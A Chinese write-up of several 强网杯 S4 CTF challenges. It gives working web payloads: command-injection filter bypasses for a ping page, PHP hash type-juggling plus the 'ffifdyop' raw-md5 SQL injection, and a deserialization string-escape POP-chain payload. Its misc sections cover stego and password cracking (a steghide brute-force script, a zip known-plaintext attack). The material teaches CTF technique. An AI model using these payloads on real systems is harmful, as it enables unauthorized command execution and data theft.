强网先锋
主动
首先题目长这样, 很明显是考查命令执行绕过过滤字符
<?php
highlight_file("index.php");
if(preg_match("/flag/i", $_GET["ip"]))
{
die("no flag");
}
system("ping -c 3 $_GET[ip]");
?>
执行多条命令可以使用;
分号或者|
管道符闭合上一条命令
绕过方法很多,自己网上找,这里不赘述,payload如下:
?ip=;cat `ls`
?ip=;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`
?ip=;cat ./fla'g'.php
?ip=;cat ./fl\ag.php
?ip=;cat ./fl''ag.php
?ip=;cat ./fl""ag.php
?ip=;a=fl;b=ag;cat ./$a$b.php
?ip=;cat ./fl${9}ag.php
.......
查看源代码
upload
下载附件,打开是流量包文件,wireshark打开
查看http
的包,追踪一下
很明显是POST上传的图片
File->Export Object->HTTP...
将文件Save all
保存出来,得到如下:
%5c
有提示steghide
隐藏
steghide.php
用notepad++打开
去掉前面这四行,保存修改后缀为jpg
或者png
都行,得到如下图:
然后把照片丢进kali
使用steghide
工具提取隐藏信息
有密码,在网上找个爆破steghide密码的脚本,如下:
# -*- coding: utf8 -*-
#python2
from subprocess import *
def foo():
stegoFile='a.jpg'#这里填图片名称
extractFile='hide.txt'#输出从图片中得到的隐藏内容
passFile='english.dic'#字典,用的是Advanced Archive Password Recovery的字典
errors=['could not extract','steghide --help','Syntax error']
cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
f=open(passFile,'r')
for line in f.readlines():
cmd=cmdFormat %(stegoFile,extractFile,line.strip())
p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
content=unicode(p.stdout.read(),'gbk')
for err in errors:
if err in content:
break
else:
print content,
print 'the passphrase is %s' %(line.strip())
f.close()
return
if __name__ == '__main__':
foo()
print 'ok'
pass
密码是:123456
hide.txt
已经提取了隐藏的flag的内容,或者也可以steghide extract -sf a.jpg
然后输入密码,得到flag.txt
flag{
te11_me_y0u_like_it}
Funhash
<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
die('level 1 failed');
}
//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
die('level 2 failed');
}
//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
?>
level 1
PHP处理hash字符的时候会将0e
开头的字符串解释为0
,md4
和md5
都是这样,所以只需要找到加密前是以0e
开头的,加密后也是0e
开头的字符即可,网上找了两个如下:
PS C:\Users\Administrator> php -r "var_dump(hash('md4','0e251288019'));"
string(32) "0e874956163641961271069404332409"
PS C:\Users\Administrator> php -r "var_dump(hash('md4','0e001233333333333334557778889'));"
string(32) "0e434041524824285414215559233446"
?hash1=0e251288019
?hash1=0e001233333333333334557778889
level 2
md5===
判断,传入数组即可,并且数组的值不一样即可绕过
&hash2[]=2&hash3=3
level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
这个md5插入的位置很容易就让人联想到字符串ffifdyop
经过md5(string,raw)
加密后得到:'or'6]!r,b
放在这里正好能构成:select * from flag where password='' or 1
注入得到flag
&hash4=ffifdyop
payload:
?hash1=0e251288019&hash2[]=2&hash3[]=3&hash4=ffifdyop
web辅助
源码目录结构:
└── html
├── !
├── caches
│ └── md5($_SERVER['REMOTE_ADDR']
├── class.php
├── common.php
├── index.php
└── play.php
POP+反序列化字符串逃逸
<?php
class player{
protected $user;
protected $pass;
protected $admin;
public function __construct($user, $pass, $admin = 0){
$this->user = $user;
$this->pass = $pass;
$this->admin = $admin;
}
public function get_admin(){
return $this->admin;
}
}
class topsolo{
protected $name;
public function __construct($name = 'Riven'){
$this->name = $name;
}
public function TP(){
if (gettype($this->name) === "function" or gettype($this->name) === "object"){
$name = $this->name;
$name();
}
}
public function __destruct(){
$this->TP();
}
}
class midsolo{
protected $name;
public function __construct($name){
$this->name = $name;
}
public function __wakeup(){
if ($this->name !== 'Yasuo'){
$this->name = 'Yasuo';
echo "No Yasuo! No Soul!\n";
}
}
public function __invoke(){
$this->Gank();
}
public function Gank(){
if (stristr($this->name, 'Yasuo')){
echo "Are you orphan?\n";
}
else{
echo "Must Be Yasuo!\n";
}
}
}
class jungle{
protected $name = "";
public function __construct($name = "Lee Sin"){
$this->name = $name;
}
public function KS(){
system("cat /flag");
}
public function __toString(){
$this->KS();
return "";
}
}
?>
这里的POP链很简单:
topsolo::__destruct()->topsolo::TP()->midsolo::__invoke()->midsolo::Gank()->jungle::__toString->jungle::KS()
可控点只有$username
和$password
//index.php
$username = $_GET['username'];
$password = $_GET['password'];
$player = new player($username, $password);
file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player)));
显然这两个可控点没有办法满足我们想要反序列化控制其他类的,所以需要逃逸序列化字符
//common.php
function read($data){
$data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
return $data;
}
function write($data){
$data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
return $data;
}
index.php
中write(serialize($player))
write函数写在了序列化之后,然后read()函数读取进行反序列化,然后就可以通过控制$username
和$password
导致溢出序列化字符串
\0*\0
长度为5
,chr(0)."*".chr(0)
长度为3
,一次\0*\0
替换chr(0)."*".chr(0)
可以溢出2
个字符位置
首先来看POP链的构造得到的序列化字符长度:
<?php
class topsolo{
protected $name;
public function __construct($name = 'Riven'){
$this->name = $name;
$this->name = new midsolo($name);
}
}
class midsolo{
protected $name;
public function __construct($name){
$this->name = $name;
$this->name = new jungle($name);
}
}
class jungle{
protected $name="";
}
$res = new topsolo($name);
echo serialize($res);
?>
得到如下字符串,长度为:102
O:7:"topsolo":1:{
s:7:" * name";O:7:"midsolo":1:{
s:7:" * name";O:6:"jungle":1:{
s:7:" * name";s:0:"";}}}
再来看一下player
类的序列化结果:
<?php
class player{
protected $user;
protected $pass;
protected $admin;
public function __construct($user, $pass, $admin = 0){
$this->user = $user;
$this->pass = $pass;
$this->admin = $admin;
}
public function get_admin(){
return $this->admin;
}
}
$res = new player($user,$pass);
echo serialize($res);
?>
得到如下字符串
O:6:"player":3:{
s:7:" * user";N;s:7:" * pass";N;s:8:" * admin";i:0;}
那么需要吞掉的字符串为:;s:7:" * pass";s:102:"
,长度:22
一个\0*\0
可以逃逸两个字符,那么长度22
就需要11
个\0*\0
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password=;s:7:" * pass";O:7:"topsolo":1:{
s:7:" * name";O:7:"midsolo":1:{
s:7:" * name";O:6:"jungle":1:{
s:7:" * name";s:0:"";}}}
然后因为是protected
属性,将*
替换为%00*%00
或者\00*\00
,以及这里考查了几个小姿势
绕过__wakeup
,修改对象属性个数大于真实个数即可
//class.php
public function __wakeup(){
if ($this->name !== 'Yasuo'){
$this->name = 'Yasuo';
echo "No Yasuo! No Soul!\n";
}
}
绕过检测字符name
,修改属性名小写s
为大写S
,并使用十六进制绕过即可
//common.php
function check($data)
{
if(stristr($data, 'name')!==False){
die("Name Pass\n");
}
else{
return $data;
}
}
综上所述
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password=;s:7:"%00*%00pass";O:7:"topsolo":1:{
S:7:"%00*%00\6eame";O:7:"midsolo":2:{
S:7:"%00*%00\6eame";O:6:"jungle":1:{
S:7:"%00*%00\6eame";s:0:"";}}}
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;s:7:"%00*%00pass";O:7:"topsolo":1:{
S:7:"%00*%00\6eame";O:7:"midsolo":2:{
S:7:"%00*%00\6eame";O:6:"jungle":1:{
S:7:"%00*%00\6eame";s:0:"";}}}
传入payload
访问play.php
触发反序列化
Misc
签到
老天爷,哪次比赛让我签到拿个一血也行啊~
flag{
welcome_to_qwb_S4}
问卷调查
枯了,比赛的时问卷调查最后出来的,竟然没看到,发现的时候已经结束了…orz
flag{
Welc0me_tO_qwbS4_Hope_you_play_h4ppily}
miscstudy
Hint: 本题目flag由7个部分构成,第一个部分为flag{
level1...,最后一个部分为 !!!} 每一关都会存有flag的一部分,将所有flag的字符串拼接即为最后flag
首先下载附件解压是一个流量包,打开后筛选http
的包,访问这个url
得到level1
和level2
的flag
flag{
level1_begin_and_level2_is_come
除了flag之外,页面中这些其他的参数应该很明显就是TLS
协议的Master-Secret log file
讲这些参数保存为ket.txt
在wireshark中,Edit->Preferences->Protocols->TLS->(Pre)-Master-Secret log filename
中选择ket.txt
然后点击OK
添加成功后,再次查看http协议的包,发现多了个包
保存图片,使用010 Ediotr或者winhex之类的16进制编辑工具查看
chunk8-chunk11
的IDAT标志
后都跟着一串类似base64的编码,而且除了chunk11
其他chunk
的base编码看着应该就是大量的01
,其中chunk11
中的IDAT
后的内容比较不一样,复制出来解密得到:
level3_start_it
chunk8-chunk10
三段中得到base64编码如下:
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTExMTExMTExMTEwMDAwMDAwMTAwMTEwMDAwMTAwMDAwMDAwMDExMTAwMDAxMTExMTExMTExMTAwMDAxMTExMTExMTExMTEwMDAwMDAwMTEwMTExMDAwMTAwMDAwMDAwMDExMTAwMDAxMTExMTExMTExMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDExMTExMTEwMDEwMDAwMDAwMDAxMTAwMTExMDAxMDAwMDAwMDAwMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDAwMTEwMTEwMDEwMDAwMDAwMDAwMDAxMTExMDAxMDAwMDAwMDAwMTAwMDAxMTAwMTExMTAwMTEwMDEwMDAwMTAwMTEwMDEwMDExMTAwMDAwMDExMTAxMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDAwMTAwMDAwMDAxMTEwMDExMTExMTEwMDEwMDAwMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDAwMDAwMDAwMDAxMTEwMDExMTEwMTEwMDEwMDAwMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDExMTAwMTAwMTExMTExMTExMTAwMTEwMDExMTAwMDAwMDAxMTExMTAwMTAwMDAxMTAwMDAwMDAwMTEwMDExMDAwMDAwMDAwMTExMTAwMTEwMTEwMTEwMDAwMDAxMDAwMDAwMDAwMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDExMDAwMDAwMDExMTAwMDExMTExMTEwMDExMDAxMDAwMDAwMDAwMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAxMDAxMDAxMTAwMTEwMTEwMDEwMDExMDAxMTExMTExMTExMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAxMDAxMTAwMDAwMTAwMTEwMDEwMDExMDAxMTExMTExMTExMTAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMTExMTEwMDEwMDExMDAwMTExMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDEwMDAxMTExMTAwMDEwMDExMDAwMDExMTAxMTAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDAwMTExMTAwMDAwMDAxMDAwMDAwMDExMDAwMDAxMTExMTExMDAxMTExMDAwMTExMDAwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMDAxMDAwMDAwMDExMDAwMDAwMDAwMDExMDAxMDAwMDAwMDAwMDAwMDAwMDEwMDAwMDAxMDAwMDExMTAwMDAxMDAwMDAwMTExMTAwMTEwMDAwMDExMDAwMDAwMDEwMDAwMDAwMDAxMTEwMDExMDAxMTExMTEwMDAwMDAwMDAwMDAwMDEwMDAxMDAxMTEwMDExMTExMDAwMDEwMDExMDAwMDAxMTEwMDExMDAxMTExMTEwMDAwMDAwMDAwMDAwMDExMDAxMDAxMTEwMDExMTExMDAwMDEwMDExMDAwMDAxMTAwMTExMDAwMDAwMDExMTExMDAwMDAwMDEwMDAwMTAwMDAwMTAwMTAwMTExMDAwMDAwMTAwMTAwMDAwMDAxMTAwMDAwMDAwMTExMDExMDAwMDAwMTExMDAwMTAwMDAxMTAwMDAwMTExMDAwMDAwMDAwMDAwMDAwMDExMTAwMDAwMTExMTEwMDExMDAwMDAxMTExMTExMTAwMDAxMTAwMDExMTExMTEwMDEwMDAwMDAwMDAwMDAwMTExMDAxMDAxMTAwMDAwMDAwMDAxMTAwMDAwMTExMDAxMTEwMDExMTExMDAxMDAwMTAwMTAwMDAwMDAwMTExMDAxMDAxMDAwMDAwMDAwMDAxMDAwMDAwMTExMDAxMTEwMDExMTExMDAxMTAwMTAwMTAwMDAwMDExMTAwMDAwMTEwMDExMTExMTExMDAwMDAwMDExMTAwMDAxMTExMTExMDAwMDAxMTEwMDExMTAwMDAwMDExMDAwMDAwMDEwMDExMTExMTEwMDAwMDAwMDExMTAwMDAxMTExMTExMDAwMDAwMTEwMDAxMTAwMDAwMDAwMDAwMTAwMDAwMDEwMDAwMDAwMDAwMDAwMDExMDAwMDAxMTEwMDExMDAxMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMDAwMDAwMDAwMDAwMDEwMDAxMDAxMTExMTEwMDAwMTAwMDAwMDAwMTAwMDAwMDExMTExMTExMTAxMTExMTAwMDAwMDAwMDAwMDExMDAwMDAwMDAxMTEwMDAwMDAwMTExMTExMTAwMTEwMDAwMDAxMTAwMDAwMDAwMDEwMDAwMDAwMDAwMDExMTAwMDAwMDAxMTEwMDAwMDAwMTExMTExMTAwMTExMDAwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMDAxMTEwMDAwMTAwMTExMTExMTExMTExMDAwMDAwMDExMTAwMTExMDAwMDExMDAwMDAxMTAwMDAwMDAwMDAxMTExMDAwMTEwMDAxMDAxMTAwMTExMDAwMDAwMDExMDAwMDExMTAwMDExMDAwMDAwMDAwMDAwMDAwMDAxMTExMTAwMTExMDAxMTAwMTAwMTAxMTExMTExMTExMDAxMTExMTAwMDAxMDAxMTEwMDExMTExMTAwMDAxMTAwMDAwMTExMTEwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMTExMTAwMDExMDAwMDAwMDExMTAwMTAwMDAxMDAwMDAwMTExMTEwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMTExMDAwMDExMDAwMDAwMDExMTAwMTAwMDAwMDExMDExMTAwMDAwMDExMTAwMDAwMDAwMDAwMDAwMDAxMTEwMDAwMDExMTExMDAwMDAxMTAwMTAwMDAwMTExMTExMTAwMDAwMDExMDAwMDAwMDAwMDAwMDAwMDExMTAwMDAwMDAxMTAxMDAwMDAwMTAwMTAwMDAxMTExMTAwMDAwMTEwMDEwMDAwMTAwMDAwMDAwMDExMTExMDAwMDEwMDAwMDAwMDAxMTAwMDEwMDAwMDAwMTExMTAwMDAwMDAwMDEwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAxMTAwMDAwMDAwMDAwMDExMTAwMTAwMDAwMDEwMDExMTExMDAwMDExMTAwMDAwMDAxMTEwMDAwMDAwMTExMDAwMTAwMDAwMDAxMTAwMTExMDAwMTExMTEwMDExMTExMDAxMTExMTExMTAwMDAxMDEwMDExMTExMTExMTAwMDExMDAwMDAxMDAwMTExMDAwMTExMTEwMDExMTExMDAxMTExMTExMTAwMDAxMTEwMDExMDExMTExMTAwMDExMDAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMDAxMDAxMTEwMDAwMDAxMTEwMDAxMTExMDAwMDAxMTAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMDAwMDAxMTAwMDAwMDAwMTEwMDAwMDExMDAwMDAxMTAwMDAwMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAwMTExMDAwMTEwMDAwMTExMTAwMDExMDAxMDAxMTAwMTExMTAwMDAxMTAwMDAwMDAwMTEwMDAwMTExMTAwMDAwMDExMTExMTExMDAxMTEwMDAxMDAwMDAxMTAwMTExMDAwMDAxMTAwMDAwMDAwMTEwMDAwMTExMTAwMDAwMDExMTExMTExMDAxMTEwMDExMDAwMDAxMTAwMTExMDAwMDAxMTAwMTExMTAwMTEwMDAwMTAwMDAxMDAwMDAwMTAwMDAxMDAxMTEwMDExMTExMTExMTAwMDAwMDAwMDAxMTAwMTExMTAwMTEwMDAwMTAwMDAxMDAwMDAxMTAwMDAxMDAxMTAwMDAxMTExMTExMDAwMDAwMDAwMDAxMTAwMTExMTAwMTEwMDEwMDExMDAwMTExMTExMTExMDAwMTExMTEwMDAwMTExMDAwMDExMDExMTAwMDAxMTAwMTExMTAwMTEwMDAwMDExMDAwMTEwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAwMDExMDExMTAwMDAxMTAwMTExMTAwMTEwMDAwMDExMTExMTEwMDAwMDAwMTAwMDAxMTEwMDExMDAwMDAwMDAwMDExMTAwMDAxMTAwMDAwMDAwMTEwMDExMTAwMTAwMTExMDAwMDExMDAxMTExMTAwMDExMTExMTExMTExMTAwMDAwMDAxMTAwMDAwMDAwMTEwMDExMTAwMTAwMTExMDAwMDExMDAxMTExMTAwMDExMTExMTExMTExMTAwMDAwMDAxMDExMTExMTExMDEwMDEwMDExMTExMTEwMDExMTExMDAxMDAxMTEwMDExMTExMTAwMDAwMDExMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
base64解密得到:
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111110000000100110000100000000011100001111111111100001111111111110000000110111000100000000011100001111111111100001100000000110010011111110010000000001100111001000000000100001100000000110010000110110010000000000001111001000000000100001100111100110010000100110010011100000011101001001111100100001100111100110000100000001110011111110010000001001111100100001100111100110000000000001110011110110010000001001111100100001100111100110011100100111111111100110011100000001111100100001100000000110011000000000111100110110110000001000000000100001100000000110010011000000011100011111110011001000000000100001111111111110010011001001001100110110010011001111111111100001111111111110010011001001100000100110010011001111111111100000000000000000010011111110010011000111000100000000000000000000000000000000010001111100010011000011101100000000000000000001110011000111100000001000000011000001111111001111000111000000110000000000000000001000000011000000000011001000000000000000010000001000011100001000000111100110000011000000010000000001110011001111110000000000000010001001110011111000010011000001110011001111110000000000000011001001110011111000010011000001100111000000011111000000010000100000100100111000000100100000001100000000111011000000111000100001100000111000000000000000011100000111110011000001111111100001100011111110010000000000000111001001100000000001100000111001110011111001000100100000000111001001000000000001000000111001110011111001100100100000011100000110011111111000000011100001111111000001110011100000011000000010011111110000000011100001111111000000110001100000000000100000010000000000000011000001110011001000000100100000000000000000110000000000000000000001110011011100000000000000010001001111110000100000000100000011111111101111100000000000011000000001110000000111111100110000001100000000010000000000011100000001110000000111111100111000000100000000010000000001110000100111111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
将base64解密得到的这些二进制保存为file.txt
总长度: 3600
使用01二进制转二维码脚本:
import PIL
from PIL import Image
MAX = 60
img = Image.new("RGB",(MAX,MAX))
i = 0
str = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111110000000100110000100000000011100001111111111100001111111111110000000110111000100000000011100001111111111100001100000000110010011111110010000000001100111001000000000100001100000000110010000110110010000000000001111001000000000100001100111100110010000100110010011100000011101001001111100100001100111100110000100000001110011111110010000001001111100100001100111100110000000000001110011110110010000001001111100100001100111100110011100100111111111100110011100000001111100100001100000000110011000000000111100110110110000001000000000100001100000000110010011000000011100011111110011001000000000100001111111111110010011001001001100110110010011001111111111100001111111111110010011001001100000100110010011001111111111100000000000000000010011111110010011000111000100000000000000000000000000000000010001111100010011000011101100000000000000000001110011000111100000001000000011000001111111001111000111000000110000000000000000001000000011000000000011001000000000000000010000001000011100001000000111100110000011000000010000000001110011001111110000000000000010001001110011111000010011000001110011001111110000000000000011001001110011111000010011000001100111000000011111000000010000100000100100111000000100100000001100000000111011000000111000100001100000111000000000000000011100000111110011000001111111100001100011111110010000000000000111001001100000000001100000111001110011111001000100100000000111001001000000000001000000111001110011111001100100100000011100000110011111111000000011100001111111000001110011100000011000000010011111110000000011100001111111000000110001100000000000100000010000000000000011000001110011001000000100100000000000000000110000000000000000000001110011011100000000000000010001001111110000100000000100000011111111101111100000000000011000000001110000000111111100110000001100000000010000000000011100000001110000000111111100111000000100000000010000000001110000100111111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
for x in range(MAX):
for y in range(MAX):
if(str[i] == '1'):
img.putpixel([x,y],(0,0,0))
else:
img.putpixel([x,y],(255,255,255))
i = i+1
img.show()
img.save("result.png")
得到二维码,使用QR Research
扫描
网盘下载得到压缩包level4.zip
,解压得到level4.jpg
使用stegdetect
检测发现有jphide
使用stegbreak
爆破密码,得到密码为:power123
使用JPHS
工具打开图片,点击Seek
输入密码
然后会导出个文件(不需要输入文件后缀什么的,直接随便输入文件名导出即可)这里导出为level4
level4_here_all
网盘下载附件,得到压缩包level5.zip
,解压,如下:
level5_is_aaa
level6.zip
和level7.zip
都有压缩密码,解不开,先看到level6.zip
原始文件大小都是<=5 Byte,猜测CRC32碰撞,网上很多其他的CRC32碰撞脚本都试了不行,最后找到这个Zip-CRC32碰撞脚本:
Zip-CRC32碰撞脚本: https://github.com/kmyk/zip-crc-cracker
注: 该脚本笔者运行环境为Linux,Windows试过几次不行
按照1,2,3
的顺序排好
level6_isready
使用ARCHPR
打开level7.zip
,1.png
压缩成1.zip
添加到明文密钥进行明文爆破
根据网上的师傅的说法,等到剩余时间
小于1h
即可停止
然后会自动保存名为level7_decrypted.zip
的已经解开加密的压缩包
直接解压level7_decrypted.zip
,4.png
和5.png
分辨率一样,size不一样,盲水印
BlindWaterMask: https://github.com/chishaxie/BlindWaterMark
PS D:\Tools\Misc\BlindWaterMark> python3 .\bwmforpy3.py decode .\4.png .\5.png result.png
image<.\4.png> + image(encoded)<.\5.png> -> watermark<result.png>
level7ishere
并且得到最后一关的相关地址:http://39.99.247.28/final_level/
html snow隐写
html snow隐写解密网站:http://fog.misty.com/perry/ccs/snow/snow/snow.html
把网址格式填对,Password为题目注释中的括号里的内容
点击Decrypt
the_misc_examaaaaaaa_!!!}
综上所述,flag为其部分拼接:
flag{
level1_begin_and_level2_is_comelevel3_start_itlevel4_here_alllevel5_is_aaalevel6_isreadylevel7isherethe_misc_examaaaaaaa_!!!}
这里只是线上比赛的一小部分题目,恕笔者太菜,目前就复现了这些题目,后续复现了别的,再补充上来